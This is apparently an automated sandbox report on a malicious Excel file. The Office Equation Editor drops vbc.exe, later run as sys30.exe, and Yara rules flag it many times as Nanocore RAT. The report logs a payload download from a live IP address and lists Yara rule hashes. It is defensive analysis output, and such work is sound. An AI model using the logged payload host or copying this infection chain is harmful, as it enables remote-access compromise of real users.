Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000006.00000002.520345431.0000000005A70000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.696728913.0000000005AB0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000006.00000002.519221520.0000000002231000.00000004.00000001.sdmp, sys30.exe, 00000007.00000002.689029376.00000000026D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: sys30.exe	String found in binary or memory: http://tempuri.org/PendingProList.xsd
Source: sys30.exe	String found in binary or memory: http://tempuri.org/ProductDataSet.xsd
Source: sys30.exe	String found in binary or memory: http://tempuri.org/ProductDataSet1.xsd
Source: vbc.exe, 00000006.00000002.519166195.0000000000D82000.00000020.00020000.sdmp, sys30.exe, 00000007.00000000.503536926.0000000001222000.00000020.00020000.sdmp, sys30.exe, 00000008.00000000.515458135.0000000001222000.00000020.00020000.sdmp	String found in binary or memory: http://tempuri.org/ProductDataSet1.xsd#CustomerDataTableuThe
Source: sys30.exe	String found in binary or memory: http://tempuri.org/login2DataSet.xsd
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000006.00000002.520345431.0000000005A70000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.696728913.0000000005AB0000.00000002.00020000.sdmp, sys30.exe, 00000008.00000002.524598460.0000000005BB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: sys30.exe, 00000008.00000002.523915323.0000000002A92000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000006.00000002.519221520.0000000002231000.00000004.00000001.sdmp, sys30.exe, 00000007.00000002.689029376.00000000026D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: sys30.exe	String found in binary or memory: https://www.google.com/

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13E09461.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.google.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /truth/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.238.159.178Connection: Keep-Alive

E-Banking Fraud:

Yara detected Nanocore RAT

Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.26ee188.22.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.740000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.693081728.0000000003770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.693644067.0000000003908000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
